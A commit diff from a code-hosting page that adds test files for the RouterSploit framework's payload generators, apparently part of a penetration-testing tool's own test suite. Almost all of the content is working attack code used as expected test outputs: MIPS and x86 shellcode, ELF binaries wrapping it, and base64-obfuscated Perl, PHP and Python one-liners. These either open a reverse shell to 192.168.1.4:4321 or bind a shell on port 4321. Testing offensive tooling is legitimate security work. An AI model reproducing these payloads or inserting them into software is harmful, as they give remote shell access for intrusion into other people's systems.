b"\x01\x09\x09\x0c\x24\x0c\xff\xfd\x01\x80\x20\x27\x01\x80\x28"
b"\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x09\x09\x0c\x30\x44"
b"\xff\xff\x24\x02\x0f\xc9\x01\x09\x09\x0c\x24\x02\x0f\xc9\x01"
b"\x09\x09\x0c\x3c\x05\x00\x02\x34\xa5\x10\xe1\xaf\xa5\xff\xf8"
b"\x3c\x05\xc0\xa8\x34\xa5\x01\x04\xaf\xa5\xff\xfc\x23\xa5\xff"
b"\xf8\x24\x0c\xff\xef\x01\x80\x30\x27\x24\x02\x10\x4a\x01\x09"
b"\x09\x0c\x3c\x08\x2f\x2f\x35\x08\x62\x69\xaf\xa8\xff\xec\x3c"
b"\x08\x6e\x2f\x35\x08\x73\x68\xaf\xa8\xff\xf0\x28\x07\xff\xff"
b"\xaf\xa7\xff\xf4\xaf\xa7\xff\xfc\x23\xa4\xff\xec\x23\xa8\xff"
b"\xec\xaf\xa8\xff\xf8\x23\xa5\xff\xf8\x27\xbd\xff\xec\x28\x06"
b"\xff\xff\x24\x02\x0f\xab\x00\x90\x93\x4c"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
assert payload.generate_elf(reverse_tcp) == elf_mipsbe_reverse_tcp
tests/payloads/mipsle/test_bind_tcp.py 0 → 100644
from routersploit.modules.payloads.mipsle.bind_tcp import Exploit
# mipsle bind tcp payload with rport=4321
bind_tcp = (
b"\xe0\xff\xbd\x27\xfd\xff\x0e\x24\x27\x20\xc0\x01\x27\x28\xc0"
b"\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01\x01\x01\xff\xff"
b"\x50\x30\xef\xff\x0e\x24\x27\x70\xc0\x01\x10\xe1\x0d\x24\x04"
b"\x68\xcd\x01\xfd\xff\x0e\x24\x27\x70\xc0\x01\x25\x68\xae\x01"
b"\xe0\xff\xad\xaf\xe4\xff\xa0\xaf\xe8\xff\xa0\xaf\xec\xff\xa0"
b"\xaf\x25\x20\x10\x02\xef\xff\x0e\x24\x27\x30\xc0\x01\xe0\xff"
b"\xa5\x23\x49\x10\x02\x24\x0c\x01\x01\x01\x25\x20\x10\x02\x01"
b"\x01\x05\x24\x4e\x10\x02\x24\x0c\x01\x01\x01\x25\x20\x10\x02"
b"\xff\xff\x05\x28\xff\xff\x06\x28\x48\x10\x02\x24\x0c\x01\x01"
b"\x01\xff\xff\xa2\xaf\xfd\xff\x11\x24\x27\x88\x20\x02\xff\xff"
b"\xa4\x8f\x21\x28\x20\x02\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff"
b"\xff\x10\x24\xff\xff\x31\x22\xfa\xff\x30\x16\xff\xff\x06\x28"
b"\x62\x69\x0f\x3c\x2f\x2f\xef\x35\xec\xff\xaf\xaf\x73\x68\x0e"
b"\x3c\x6e\x2f\xce\x35\xf0\xff\xae\xaf\xf4\xff\xa0\xaf\xec\xff"
b"\xa4\x27\xf8\xff\xa4\xaf\xfc\xff\xa0\xaf\xf8\xff\xa5\x27\xab"
b"\x0f\x02\x24\x0c\x01\x01\x01"
)
# elf mipsle bind tcp
elf_mipsle_bind_tcp = (
b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x02\x00\x08\x00\x01\x00\x00\x00\x54\x00\x40\x00\x34\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01"
b"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x40\x00\x00\x00\x40\x00\x3c\x01\x00\x00\x24\x02\x00"
b"\x00\x07\x00\x00\x00\x00\x10\x00\x00\xe0\xff\xbd\x27\xfd\xff"
b"\x0e\x24\x27\x20\xc0\x01\x27\x28\xc0\x01\xff\xff\x06\x28\x57"
b"\x10\x02\x24\x0c\x01\x01\x01\xff\xff\x50\x30\xef\xff\x0e\x24"
b"\x27\x70\xc0\x01\x10\xe1\x0d\x24\x04\x68\xcd\x01\xfd\xff\x0e"
b"\x24\x27\x70\xc0\x01\x25\x68\xae\x01\xe0\xff\xad\xaf\xe4\xff"
b"\xa0\xaf\xe8\xff\xa0\xaf\xec\xff\xa0\xaf\x25\x20\x10\x02\xef"
b"\xff\x0e\x24\x27\x30\xc0\x01\xe0\xff\xa5\x23\x49\x10\x02\x24"
b"\x0c\x01\x01\x01\x25\x20\x10\x02\x01\x01\x05\x24\x4e\x10\x02"
b"\x24\x0c\x01\x01\x01\x25\x20\x10\x02\xff\xff\x05\x28\xff\xff"
b"\x06\x28\x48\x10\x02\x24\x0c\x01\x01\x01\xff\xff\xa2\xaf\xfd"
b"\xff\x11\x24\x27\x88\x20\x02\xff\xff\xa4\x8f\x21\x28\x20\x02"
b"\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\x10\x24\xff\xff\x31"
b"\x22\xfa\xff\x30\x16\xff\xff\x06\x28\x62\x69\x0f\x3c\x2f\x2f"
b"\xef\x35\xec\xff\xaf\xaf\x73\x68\x0e\x3c\x6e\x2f\xce\x35\xf0"
b"\xff\xae\xaf\xf4\xff\xa0\xaf\xec\xff\xa4\x27\xf8\xff\xa4\xaf"
b"\xfc\xff\xa0\xaf\xf8\xff\xa5\x27\xab\x0f\x02\x24\x0c\x01\x01"
b"\x01"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.rport = 4321
assert payload.generate() == bind_tcp
assert payload.generate_elf(bind_tcp) == elf_mipsle_bind_tcp
tests/payloads/mipsle/test_reverse_tcp.py 0 → 100644
from routersploit.modules.payloads.mipsle.reverse_tcp import Exploit
# mipsle reverse tcp with lhost=192.168.1.4 lport=4321
reverse_tcp = (
b"\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04"
b"\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20"
b"\x80\x01\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27"
b"\x20\x80\x01\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24"
b"\x0c\x09\x09\x01\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09"
b"\x01\xc9\x0f\x02\x24\x0c\x09\x09\x01\x10\xe1\x05\x3c\x02\x00"
b"\xa5\x34\xf8\xff\xa5\xaf\x01\x04\x05\x3c\xc0\xa8\xa5\x34\xfc"
b"\xff\xa5\xaf\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01"
b"\x4a\x10\x02\x24\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08"
b"\x35\xec\xff\xa8\xaf\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff"
b"\xa8\xaf\xff\xff\x07\x28\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec"
b"\xff\xa4\x23\xec\xff\xa8\x23\xf8\xff\xa8\xaf\xf8\xff\xa5\x23"
b"\xec\xff\xbd\x27\xff\xff\x06\x28\xab\x0f\x02\x24\x0c\x09\x09"
b"\x01"
)
# elf mipsle reverse tcp
elf_mipsle_reverse_tcp = (
b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x02\x00\x08\x00\x01\x00\x00\x00\x54\x00\x40\x00\x34\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01"
b"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x40\x00\x00\x00\x40\x00\x18\x01\x00\x00\xdc\x01\x00"
b"\x00\x07\x00\x00\x00\x00\x10\x00\x00\xff\xff\x04\x28\xa6\x0f"
b"\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28\xa6\x0f\x02\x24\x0c"
b"\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01\xa6\x0f\x02\x24"
b"\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01\x27\x28\x80"
b"\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01\xff\xff"
b"\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24\x0c"
b"\x09\x09\x01\x10\xe1\x05\x3c\x02\x00\xa5\x34\xf8\xff\xa5\xaf"
b"\x01\x04\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf\xf8\xff\xa5"
b"\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24\x0c\x09"
b"\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf\x73"
b"\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28"
b"\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8"
b"\x23\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff"
b"\x06\x28\xab\x0f\x02\x24\x0c\x09\x09\x01"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
assert payload.generate_elf(reverse_tcp) == elf_mipsle_reverse_tcp
tests/payloads/perl/test_bind_tcp.py 0 → 100644
from routersploit.modules.payloads.perl.bind_tcp import Exploit
# perl bind tcp payload with rport=4321
bind_tcp = (
"use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs='));"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.rport = 4321
assert payload.generate() == bind_tcp
tests/payloads/perl/test_reverse_tcp.py 0 → 100644
from routersploit.modules.payloads.perl.reverse_tcp import Exploit
# reverse udp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = (
"use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjEuNDo0MzIxIik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Ow=='));"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
tests/payloads/php/test_reverse_tcp.py 0 → 100644
from routersploit.modules.payloads.php.reverse_tcp import Exploit
# php reverse tcp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = (
"eval(base64_decode('JHM9ZnNvY2tvcGVuKCJ0Y3A6Ly8xOTIuMTY4LjEuNCIsNDMyMSk7d2hpbGUoIWZlb2YoJHMpKXtleGVjKGZnZXRzKCRzKSwkbyk7JG89aW1wbG9kZSgiXG4iLCRvKTskby49IlxuIjtmcHV0cygkcywkbyk7fQ=='));"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
tests/payloads/python/test_bind_tcp.py 0 → 100644
from routersploit.modules.payloads.python.bind_tcp import Exploit
# python bind tcp payload with rport=4321
bind_tcp = (
"exec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uYmluZCgoJzAuMC4wLjAnLDQzMjEpKQpzby5saXN0ZW4oMSkKc28sYWRkcj1zby5hY2NlcHQoKQp4PUZhbHNlCndoaWxlIG5vdCB4OgoJZGF0YT1zby5yZWN2KDEwMjQpCglzdGRpbixzdGRvdXQsc3RkZXJyLD1vcy5wb3BlbjMoZGF0YSkKCXN0ZG91dF92YWx1ZT1zdGRvdXQucmVhZCgpK3N0ZGVyci5yZWFkKCkKCXNvLnNlbmQoc3Rkb3V0X3ZhbHVlKQo='.decode('base64'))"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.rport = 4321
assert payload.generate() == bind_tcp
tests/payloads/python/test_bind_udp.py
from routersploit.modules.payloads.python.bind_udp import Exploit
# bind udp payload with rport=4321
# python bind udp payload with rport=4321
bind_udp = (
"exec('ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbixQSVBFCmZyb20gc29ja2V0IGltcG9ydCBzb2NrZXQsIEFGX0lORVQsIFNPQ0tfREdSQU0Kcz1zb2NrZXQoQUZfSU5FVCxTT0NLX0RHUkFNKQpzLmJpbmQoKCcwLjAuMC4wJyw0MzIxKSkKd2hpbGUgMToKCWRhdGEsYWRkcj1zLnJlY3Zmcm9tKDEwMjQpCglvdXQ9UG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1QSVBFLHN0ZGVycj1QSVBFKS5jb21tdW5pY2F0ZSgpCglzLnNlbmR0bygnJy5qb2luKFtvdXRbMF0sb3V0WzFdXSksYWRkcikK'.decode('base64'))"
)
......
tests/payloads/python/test_reverse_tcp.py 0 → 100644
from routersploit.modules.payloads.python.reverse_tcp import Exploit
# python reverse tcp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = (
"exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoJzE5Mi4xNjguMS40Jyw0MzIxKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpvcy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='.decode('base64'))"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
tests/payloads/python/test_reverse_udp.py
from routersploit.modules.payloads.python.reverse_udp import Exploit
# reverse udp payload with lhost=192.168.1.4 lport=4321
# python reverse udp payload with lhost=192.168.1.4 lport=4321
reverse_udp = (
"exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuNCcsNDMyMSkpCm9zLmR1cDIocy5maWxlbm8oKSwgMCkKb3MuZHVwMihzLmZpbGVubygpLCAxKQpvcy5kdXAyKHMuZmlsZW5vKCksIDIpCnB0eS5zcGF3bignL2Jpbi9zaCcpOwpzLmNsb3NlKCkK'.decode('base64'))"
)
......
tests/payloads/x86/test_bind_tcp.py
......@@ -11,6 +11,21 @@ bind_tcp = (
b"\x0b\xcd\x80"
)
# elf x86 reverse tcp
elf_x86_reverse_tcp = (
b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x02\x00\x03\x00\x01\x00\x00\x00\x54\x80\x04\x08\x34\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01"
b"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x80\x04\x08\x00\x80\x04\x08\xa2\x00\x00\x00\xf0\x00\x00"
b"\x00\x07\x00\x00\x00\x00\x10\x00\x00\x31\xdb\xf7\xe3\x53\x43"
b"\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00"
b"\x10\xe1\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41"
b"\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a"
b"\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62"
b"\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)
def test_payload_generation():
""" Test scenario - payload generation """
......
tests/payloads/x86/test_reverse_tcp.py
......@@ -10,6 +10,21 @@ reverse_tcp = (
b"\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
)
# elf x86 reverse tcp
elf_x86_reverse_tcp = (
b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x02\x00\x03\x00\x01\x00\x00\x00\x54\x80\x04\x08\x34\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01"
b"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x80\x04\x08\x00\x80\x04\x08\x98\x00\x00\x00\xdc\x00\x00"
b"\x00\x07\x00\x00\x00\x00\x10\x00\x00\x31\xdb\xf7\xe3\x53\x43"
b"\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0\x3f\xcd\x80"
b"\x49\x79\xf9\x68\xc0\xa8\x01\x04\x68\x02\x00\x10\xe1\x89\xe1"
b"\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f"
b"\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b"
b"\xcd\x80"
)
def test_payload_generation():
""" Test scenario - payload generation """
......
tests/test_module_info.py
......@@ -60,3 +60,19 @@ def test_scanner_info(scanner):
assert "devices" in info
assert isinstance(info["devices"], tuple)
@pytest.mark.parametrize("payload", iter_modules("./routersploit/modules/payloads"))
def test_payload_info(payload):
info = payload._Exploit__info__
assert isinstance(info, dict)
assert "name" in info
assert isinstance(info["name"], str)
assert "description" in info
assert isinstance(info["description"], str)
assert "authors" in info
assert isinstance(info["authors"], tuple)
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment